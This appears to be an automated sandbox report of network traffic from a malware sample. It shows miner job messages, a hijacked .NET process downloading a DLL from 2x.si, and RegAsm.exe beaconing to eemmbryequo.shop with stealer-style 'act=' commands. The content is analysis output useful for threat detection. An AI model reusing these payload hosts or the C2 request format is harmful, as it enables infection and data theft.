Sep 19, 2024 02:26:10.405206919 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 32 64 66 61 64 62 37 30 36 37 37 64 64 38 64 62 31 62 31 65 30 38 37 61 38 39 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a2dfadb70677dd8db1b1e087a89e2094e2f6a252cc0804c00df0e52bb27c8268bd580a629d000000006c53f6042851d0390be5f83a35911eedb3273b95ad109a6906e0b679c5251cde0e","job_id":"b2d004bb-d29f-4d28-9fa1-882e4
Sep 19, 2024 02:26:12.544037104 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 34 64 66 61 64 62 37 30 36 32 62 62 30 34 65 39 35 31 66 61 30 30 61 37 61 36 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a4dfadb7062bb04e951fa00a7a6ea929eb6d941636093dd9afe6ce2cd3ba384f090cf8ca81000000008419313c8e1730b1a247144ce13a4be24ac73ee5f043c605e9420541d799921603","job_id":"58ef87bc-8931-4697-a5df-af41a
Sep 19, 2024 02:26:34.393356085 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 61 64 66 61 64 62 37 30 36 32 62 62 30 34 65 39 35 31 66 61 30 30 61 37 61 36 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010badfadb7062bb04e951fa00a7a6ea929eb6d941636093dd9afe6ce2cd3ba384f090cf8ca8100000000bfc88de46c5d24092860bbec4023deb157516befbd480c42de27581802568d2113","job_id":"fca594d7-2a05-4dba-bccc-467df
Sep 19, 2024 02:26:56.409666061 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 30 64 66 61 64 62 37 30 36 32 62 62 30 34 65 39 35 31 66 61 30 30 61 37 61 36 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d0dfadb7062bb04e951fa00a7a6ea929eb6d941636093dd9afe6ce2cd3ba384f090cf8ca81000000004812f6155b6aa51652287060d83bb99fb7a538443d889f91434cda2c2bd8c51a2a","job_id":"6dc4495d-5329-456e-92db-33219
Sep 19, 2024 02:27:01.110424995 CEST	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 30 64 66 61 64 62 37 30 36 32 62 62 30 34 65 39 35 31 66 61 30 30 61 37 61 36 65 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010d0dfadb7062bb04e951fa00a7a6ea929eb6d941636093dd9afe6ce2cd3ba384f090cf8ca8100000000aa686c446952d06738cd2a7cc058c2dc010b8e173d768dade2df3cf2acc8e8e42a","job_id":"d281b2b6-3ca1-413b-8550-4c54f

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49716	172.67.143.156	443	3512	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-19 00:25:19 UTC	62	OUT	GET /o3M.dll HTTP/1.1 Host: 2x.si Connection: Keep-Alive
2024-09-19 00:25:21 UTC	652	IN	HTTP/1.1 200 OK Date: Thu, 19 Sep 2024 00:25:20 GMT Content-Type: application/octet-stream Content-Length: 2355928 Connection: close accept-ranges: bytes etag: "666e0473-23f2d8" last-modified: Sat, 15 Jun 2024 21:15:31 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPjix2qoZ60clefBGDvsKTJNTVQGrKJwysgvPidkHDT257a9JFZhiZ8%2BQ2JZcEP8UQ840VM2x2ykrz1XuUHTd9M0nDq9jKep8dQmcLhnSuxQ1EYph%2ByCgg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c55701ae93242dd-EWR alt-svc: h3=":443"; ma=86400
2024-09-19 00:25:21 UTC	717	IN	Data Raw: 6b 80 b9 56 59 d2 3d 4b 33 f2 eb 9b 13 69 f9 b4 3e f9 75 8c 7c 7a df b4 7e 51 90 77 e7 9a 50 12 45 12 c5 cc d3 3a 30 2c ea 41 a7 34 e0 4a ac 94 6b 94 53 09 ae ca cc ac 10 ce 0e 21 e5 0d b3 44 d8 de f9 f4 97 cc 3b 4c 9a 85 d7 f9 25 48 b9 13 8e 85 71 b3 8a b6 00 ed eb a0 b4 d0 61 1d e6 4d 93 87 02 73 3b 7f d1 0b 22 9a f6 79 55 0e 38 d2 15 99 00 2b 08 ab e4 94 83 06 d7 e3 b5 dc e7 e8 e2 5e ee 81 df 27 32 b5 92 87 87 d3 49 c4 13 a7 a8 98 25 b8 aa f0 9e 50 69 e4 d6 49 6b 86 c7 58 36 3a f2 b8 dd f0 22 33 3d df 85 a8 0e 07 11 77 3e 70 4c d7 68 12 94 76 27 ab 8d 8c f1 34 fe 88 95 8a d8 f4 bd d4 84 1c dc 3e 2b a7 94 48 bb ee cc 47 54 a9 fb 53 22 7f 62 db 69 03 7a a4 9d 88 56 55 84 d8 67 4f b9 44 8d 95 ac 75 8c da d9 c2 dc 2a d4 9c b8 b9 ac 17 82 50 13 fb a0 65 05 Data Ascii: kVY=K3i>u\|z~QwPE:0,A4JkS!D;L%HqaMs;"yU8+^'2I%PiIkX6:"3=w>pLhv'4>+HGTS"bizVUgODu*Pe
2024-09-19 00:25:21 UTC	1369	IN	Data Raw: 24 f3 2c 66 15 c1 59 7a 02 61 c6 fe 16 8d bb d7 f8 9c c6 3e 19 63 21 81 29 bf 74 0c 1a 50 61 8d e8 cd 4e fe 6b 27 88 27 bd 36 b8 dd 76 c7 a3 5c 11 3f 20 fe 93 4e b8 60 04 c6 7e 98 59 60 5f 41 c5 14 a4 e2 7a 97 8b 19 c2 b7 55 52 31 cc c7 43 f8 5b a5 55 ef 5a cd ce 00 d9 bd 55 3d 56 12 78 a8 46 ef 97 64 cd 81 ec bf 7a 14 e5 b7 74 a6 6c 08 a9 70 3a f0 45 5d fa 01 f1 d4 b8 5b d3 9d 15 b3 dd a2 3c c7 be 4a 26 47 70 5c 3f b5 b3 9f 14 e5 9b 6e 3f 39 6a 64 e2 4d 81 52 41 28 e2 12 8b 75 88 82 c3 96 56 9c ed 2e e2 9e 77 46 d2 82 0a f6 c9 ae 08 55 c8 01 60 b9 14 32 d4 b2 51 ab c8 ba 55 7f 03 9c 57 c4 cc 31 3b cd c4 f9 56 07 28 2b a5 9c 74 4a b7 9c 46 28 8b ed d3 4e d8 46 46 50 fe 1d 05 5e 96 a6 78 b2 52 2b db f6 c4 d4 6a 01 e7 cf 00 30 1a 34 47 f5 19 65 b5 07 0c 1d Data Ascii: $,fYza>c!)tPaNk''6v\? N`~Y`_AzUR1C[UZU=VxFdztlp:E][<J&Gp\?n?9jdMRA(uV.wFU`2QUW1;V(+tJF(NFFP^xR+j04Ge
2024-09-19 00:25:21 UTC	1369	IN	Data Raw: 17 c7 63 c3 14 5b a6 ae 79 32 8b 5c a5 9d a1 71 ce 07 33 03 c0 f3 ae 03 cd 70 6d 8c d1 d5 18 1f ad 49 1f c4 1e 7d c3 dc 59 80 ea a0 d2 c5 4a b0 ff b9 e9 f7 f4 36 2b 2c 0e 3a 24 28 55 72 70 d7 38 0f 18 df 8a 08 03 26 17 e8 d4 72 fa e0 ce 4b 31 9d c0 64 b1 7c dc 51 9e 7f 65 bc 26 cb 04 43 a3 ca 8d a5 7c a8 9e a7 ed 9a 7c 63 2d 94 d7 3e e0 8e 68 78 d5 8d 4b ec e3 ad 3a 59 50 6d 2c 4f 17 72 88 90 d9 b3 6c cf c1 67 98 5f 10 50 d1 b2 5a 50 6f 9a 9f 2b 6a b7 40 65 cb eb db 46 c4 4c 76 d3 3a e4 19 47 83 6c 71 3d f7 af 0c dc f7 af 03 14 42 d4 33 cc 5b 74 74 4f 42 4e 49 0d c3 3e fe 88 c7 02 b0 49 e4 6b cd 78 43 b7 20 61 82 14 89 db 92 63 dc 38 0a bb 9b 2e 33 23 1a f9 43 62 7c 5d fd 0e 85 4c d8 63 56 61 28 94 89 03 8d 34 48 71 49 d2 54 b6 79 44 a9 6e 3c f5 9b 8f 31 Data Ascii: c[y2\q3pmI}YJ6+,:$(Urp8&rK1d\|Qe&C\|\|c->hxK:YPm,Orlg_PZPo+j@eFLv:Glq=B3[ttOBNI>IkxC ac8.3#Cb\|]LcVa(4HqITyDn<1
2024-09-19 00:25:21 UTC	641	IN	Data Raw: 79 49 1e 5f a5 e9 a9 9f 85 f1 89 3b 33 9c 6b fb de df f1 9d 0d b1 b0 5c 3f 1b 85 bc 6f 15 80 a8 6c ef a0 4f 85 27 58 06 1f 99 fb 7b 8b 6a cd 3b 48 39 51 5a fd d2 5a 7e 79 fe 7f 72 70 ac 50 4f c0 90 79 2e b8 30 2d 58 2e d5 e3 ab 13 9d 1a b2 da 68 d4 fb 58 2e ba cd e2 2f 27 51 9c 79 d0 78 8a 02 ea c0 42 af 4a 2e 45 2f e3 08 33 41 f1 25 29 a1 2a d8 45 1e 84 6c e2 95 ae 3e c5 39 86 b9 ac eb aa ff 2d ee a2 55 cf 5d 39 e8 2c ab 25 98 86 69 42 d4 51 6b da fd 79 e0 4e df 54 e2 4c 5b ed d8 79 a6 c9 ce 97 9a 49 30 fb 7c 3e 80 61 3b aa 38 a6 f4 88 86 93 de 18 35 0f 5b b6 66 c5 31 a3 70 3d 35 be 8e 30 98 4c 48 bb b0 4a ac ad 48 4f a6 a0 f5 d7 04 c6 5f 4a eb 46 a5 5f 48 53 65 b7 42 46 68 4b a5 aa 9e b5 3f 8b 05 e1 98 65 89 dd 47 87 2f 6f ec 48 bd 46 a4 a1 51 a9 a6 36 Data Ascii: yI_;3k\?olO'X{j;H9QZZ~yrpPOy.0-X.hX./'QyxBJ.E/3A%)*El>9-U]9,%iBQkyNTL[yI0\|>a;85[f1p=50LHJHO_JF_HSeBFhK?eG/oHFQ6
2024-09-19 00:25:21 UTC	1369	IN	Data Raw: 6d db 7c ac ff ae 48 73 3e 6f f8 c6 66 ad 75 ba 47 16 e5 c6 bb b9 4c bf c6 5d 9e 24 16 02 89 10 ca 71 a2 d6 5d 8e 30 47 02 49 b6 f7 6b 82 59 46 94 8e 88 5a ac 35 1a df 91 24 8b f0 b0 5d fe 0a 11 6e ec 3f 7a ca 2d ac cc f3 f5 dc 45 71 63 b9 aa ae e9 9e f8 ef f5 2c 48 c5 60 67 8a e3 fa 93 c5 b5 03 42 8e 39 cc 21 6d d2 8b 57 31 79 e9 9d 5c 2f ff eb c5 41 b2 0d 5d 2a 4d 7f a3 b4 40 52 ec 47 40 8c ee e3 ea 9c 6a 1b 91 15 e1 d6 6d c6 0c 53 fb 22 78 a4 d4 65 0d ba e5 f2 86 02 2d 12 f0 e6 6e f6 82 a3 cd 32 1c 09 f4 28 d8 61 6f 1e c6 5c 1e 41 46 fb 4d 84 d2 3c 62 50 96 c1 56 60 b0 ac 0a c3 1d 62 c7 9d f8 db bf 9b 6a b7 d5 62 0e 9f df e1 05 3b b0 36 8e 60 50 a3 e4 ad 9d 16 88 2f c9 f7 41 46 26 17 71 e9 05 66 13 99 13 b1 66 90 ee b2 b4 c0 d5 22 28 ef 18 44 14 d2 75 Data Ascii: m\|Hs>ofuGL]$q]0GIkYFZ5$]n?z-Eqc,H`gB9!mW1y\/A]*M@RG@jmS"xe-n2(ao\AFM<bPV`bjb;6`P/AF&qff"(Du
2024-09-19 00:25:21 UTC	1369	IN	Data Raw: c0 36 76 db 9c 55 cc e8 15 9b a3 4b 6c 5c 53 56 d5 75 5c f3 02 5f 8a c5 c8 d6 59 47 62 84 cb 22 1d 57 01 f7 da c0 a8 a8 57 ab 11 0c ad 4d 61 c2 76 0b 92 21 74 f8 bb ec 1c 6c 4b 0c 1f ec 9b d2 9a 03 83 5b 68 94 0c 4c dc 4b 3f 38 8a e9 fe c2 9b 84 3c 35 1e 20 19 ce ce 08 d4 a0 de c1 5f 8b 5b 4f 25 a8 86 86 26 ec 10 f7 2f 86 33 6c 64 d6 69 89 c3 a4 06 25 5c a1 a6 99 e5 01 79 bc eb 29 46 20 35 e4 fb fc 8f ab ab 2d ab 52 a1 1e 49 cc c2 e7 66 e1 48 b4 17 b3 0b dd 39 4f e8 4d 7e 1a d0 85 d4 d9 37 6c 28 e9 28 06 4a 5a d0 d3 92 d2 f0 dd c8 a6 1b 63 bd 97 64 40 57 9c 9c cc 96 f3 50 ce 9a 06 9d 68 29 4e a0 75 50 bc 23 23 a1 2b 3f fd 63 10 5b df c7 e3 13 c9 ae 99 64 62 d6 3e a3 3d c2 9c e1 f5 9c 44 cd 01 cd ab 96 3c 13 52 f2 17 39 a7 67 ed 23 d3 ef 33 b7 04 b1 bf d1 Data Ascii: 6vUKl\SVu\_YGb"WWMav!tlK[hLK?8<5 _[O%&/3ldi%\y)F 5-RIfH9OM~7l((JZcd@WPh)NuP##+?c[db>=D<R9g#3
2024-09-19 00:25:21 UTC	1369	IN	Data Raw: a4 95 42 89 07 6b bd c8 4a 07 db 8d e9 09 ef 09 97 d4 cf 47 a2 db c4 dc 16 a6 87 48 9e b2 92 c3 99 39 1f 9b d3 21 7d 16 11 23 f6 1b ce 3f 28 e2 93 84 ef 23 de 20 7f f5 4b d7 29 25 a4 2d 47 9d d5 9f db 89 57 22 c2 0b 73 40 a2 92 b9 bb e6 b9 4a 75 dd 13 63 86 3c 09 ca fc e3 d1 52 3d 23 d9 47 7c 7f a1 61 0a 88 0f 12 d7 7d 9e 2b 12 18 2a 39 a5 d6 76 15 b8 d8 b6 ac 0c dc 86 05 f9 e5 06 2b 5f 9a c1 f0 c2 05 99 84 58 80 09 12 2f 7f d2 2b 77 68 5e 4b 50 38 e9 0d b9 30 86 c7 cd 06 02 c9 f6 b0 35 fa 07 db 54 18 2f 99 7f d4 f9 a9 ee 36 1a c4 c2 7b 8a 85 7c 49 93 41 1d c1 22 ac dd 00 5a 8e e2 31 bf 8a 95 3c 6c 39 07 fe e6 1c b2 2a ed f3 c8 5c de 64 a6 c0 72 2a b3 17 e0 cf e9 39 1b fb b9 22 7b 5a 15 85 4a 07 1b 90 84 71 ba 19 d5 96 74 7a 1b 18 59 f7 b8 8b 9e 92 da a3 Data Ascii: BkJGH9!}#?(# K)%-GW"s@Juc<R=#G\|a}+9v+_X/+wh^KP805T/6{\|IA"Z1<l9\dr*9"{ZJqtzY
2024-09-19 00:25:21 UTC	968	IN	Data Raw: 99 87 bd fc 11 9b eb c6 e2 3c ed bc 71 5e 5f cf 5e 68 cf 90 5f 26 8f 52 e1 6e af 8e 5f a9 15 a5 d9 f6 c1 5b 35 0a e0 d4 01 85 64 81 30 84 3b a4 01 62 4e db 45 29 f8 31 0a d1 e8 49 ae 83 30 6d d2 64 90 69 b2 84 55 16 92 b4 6e bd 88 66 bb 77 17 1e 20 c1 76 70 af c8 06 4a a8 b9 d4 c6 e5 e5 9e 99 b4 61 07 d7 82 ae a5 f4 f3 3a e7 29 e9 24 63 e8 1e 98 b4 b0 2b c4 65 d4 22 2b 83 24 a0 bb 85 57 18 67 d7 ea 28 a8 98 59 06 8d 7f 95 4c 6e cd 0e db bc f5 db e0 27 c1 4d f8 85 47 f8 29 04 54 70 56 aa ce 6b 5b 21 ca da 08 0c e9 ea 60 3d 27 c3 5d 33 b3 78 ae ea b6 38 38 00 cb 9b 34 2f a8 e1 9b 82 ad 91 fe 66 da df 9e 43 b3 b2 57 64 f5 2d 01 cd e8 c7 18 77 db b5 0b 00 f8 e5 05 5d 0d 47 8a db d1 cd be 76 2e d3 0b 0b 89 59 14 22 a5 3c b9 c2 f6 15 28 15 56 9f b8 81 e0 67 ec Data Ascii: <q^_^h_&Rn_[5d0;bNE)1I0mdiUnfw vpJa:)$c+e"+$Wg(YLn'MG)TpVk[!`=']3x884/fCWd-w]Gv.Y"<(Vg
2024-09-19 00:25:21 UTC	1369	IN	Data Raw: 73 8d 6d 8a bf 41 0f 38 f6 c6 65 1d ea 39 3d a7 1f 1d 77 7c dd 4c 51 2e 9b 8d 43 57 f8 d1 f4 2b b1 96 b1 14 62 a0 09 54 c6 b8 40 43 38 29 f6 d0 11 fe 1a 0b 7f c0 6a 30 c6 81 6d 39 57 31 65 75 0b ef ca 48 5a b4 9a 3b d6 80 04 16 c7 99 97 b3 44 9a cd c2 6f 39 a1 e2 2a f4 bd 73 b5 e6 33 09 25 fb ce 99 68 a5 fd b9 34 19 b3 73 71 6d b6 71 08 52 14 f9 46 0c 66 31 47 41 c4 0a 1e e9 7f f1 96 3f a2 9a bd 60 d9 14 0c b4 ba f1 71 90 62 a4 26 c0 26 3a 47 b4 d9 76 d7 ac 4d fc 03 24 c3 c7 cd 2c 2a f4 36 b7 58 e4 53 d9 93 e1 8e 41 57 46 73 a2 ea 9d ac 98 5e 22 c7 34 3e 77 79 e3 c3 cf 1b 58 b3 3a 82 98 bc ee 80 69 7e 54 07 35 58 ca bc 7d d1 11 d0 3f 37 b5 ee 2d 27 80 d9 54 72 6f 69 10 6d b1 95 31 0f ee d6 67 e7 43 e7 b9 74 67 8a 0a 63 8e f9 19 f5 ff 95 e9 82 d0 20 39 1a Data Ascii: smA8e9=w\|LQ.CW+bT@C8)j0m9W1euHZ;Do9s3%h4sqmqRFf1GA?`qb&&:GvM$,6XSAWFs^"4>wyX:i~T5X}?7-'Troim1gCtgc 9
2024-09-19 00:25:21 UTC	1369	IN	Data Raw: 88 d5 05 0f ec 35 9f 32 1e 48 38 97 8b df 34 6b c8 9d 0d 31 61 3a 44 72 e6 22 5b a5 04 98 e1 b7 43 e3 67 90 5b 88 f4 5e da f9 80 97 b2 78 96 e7 a9 92 74 2a f9 d7 4d 3f ed 6f f2 23 1f 6e 42 37 bb ac f4 df 3c 44 76 89 c3 9f d0 5c a8 5a 27 6f f5 45 47 f3 92 21 17 3f e1 de c5 3d cf e9 ba 8f 23 5c cc 38 0e 1c 14 60 2c 39 50 ba c9 30 50 ba 6d f5 61 2e 84 b7 88 bf 0c 74 0e fc ba 82 76 b7 61 9f 8e 37 d2 bf ba 83 25 fa 8c d6 43 ff 51 1a 4d 57 3c 4f 7f f8 de fb 9c 18 9e b7 14 8d d2 7e 65 03 c0 76 7f 78 ac 10 5d 44 de 47 bd 0f 31 7a 42 57 c2 59 c0 83 b4 f7 6b 17 d3 7e 02 a6 9e 2a ad 09 04 c8 26 74 ca 11 49 34 45 8e f8 60 e4 40 c4 fc 77 c4 1d d1 fc 74 15 a8 60 45 9a 63 d6 e6 37 82 b5 8a 0a a2 7f cb 14 3a 03 20 c3 ba 35 f5 c5 8a 40 c8 e4 e0 6d 1a 1b da 60 58 e7 9c 87 Data Ascii: 52H84k1a:Dr"[Cg[^xtM?o#nB7<Dv\Z'oEG!?=#\8`,9P0Pma.tva7%CQMW<O~evx]DG1zBWYk~&tI4E`@wt`Ec7: 5@m`X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49778	104.21.39.11	443	4800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-19 00:26:05 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: eemmbryequo.shop
2024-09-19 00:26:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-19 00:26:05 UTC	551	IN	HTTP/1.1 200 OK Date: Thu, 19 Sep 2024 00:26:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHMau6RW%2F3Aw%2BjgcOynOSP%2BqPpwGwC4Z3to8PggmgZ6ML1fRbz1d1YndFeJATRAp7fdh2wY1ygYOUSoVzHcDN2O2VhPM%2BmwW%2FqJ2n4idR97XpaQ59KTsrSCiIMx%2FRAXa3yph"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c5571366e716a56-EWR
2024-09-19 00:26:05 UTC	818	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-19 00:26:05 UTC	1369	IN	Data Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
2024-09-19 00:26:05 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 38 4f 41 5a 66 74 61 51 43 4f 65 5a 61 71 48 5a 6c 64 78 4a 53 39 55 79 4d 76 31 45 6c 47 39 56 65 35 6a 36 6e 6f 79 7a 43 51 59 2d 31 37 32 36 37 30 35 35 36 35 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 Data Ascii: <input type="hidden" name="atok" value="8OAZftaQCOeZaqHZldxJS9UyMv1ElG9Ve5j6noyzCQY-1726705565-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
2024-09-19 00:26:05 UTC	849	IN	Data Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 Data Ascii: m:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
2024-09-19 00:26:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49780	104.21.39.11	443	4800	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-19 00:26:05 UTC	353	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=8OAZftaQCOeZaqHZldxJS9UyMv1ElG9Ve5j6noyzCQY-1726705565-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: eemmbryequo.shop
2024-09-19 00:26:05 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 76 30 66 52 75 2d 2d 26 6a 3d 62 34 66 30 31 37 37 37 65 64 63 38 35 31 61 61 34 37 62 64 64 62 30 31 61 35 62 39 34 32 66 37 Data Ascii: act=recive_message&ver=4.0&lid=hv0fRu--&j=b4f01777edc851aa47bddb01a5b942f7
2024-09-19 00:26:06 UTC	796	IN	HTTP/1.1 200 OK Date: Thu, 19 Sep 2024 00:26:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j7m7ult6nkfu6tunsttaumc5rq; expires=Sun, 12 Jan 2025 18:12:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3O7LqK8Ay9tKwIIJJ%2BDL8sK3FuS9XyBLIz2LIOl9zohktNGj73obmd%2BXT5D5krgFTNVzCfvbHNbBJEvVC02zM3q7LEUK9IaXqT%2BW3bxNgUdYvta8GiIiyGkHNsdbbA79WJLs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c55713b892b5e6e-EWR alt-svc: h3=":443"; ma=86400
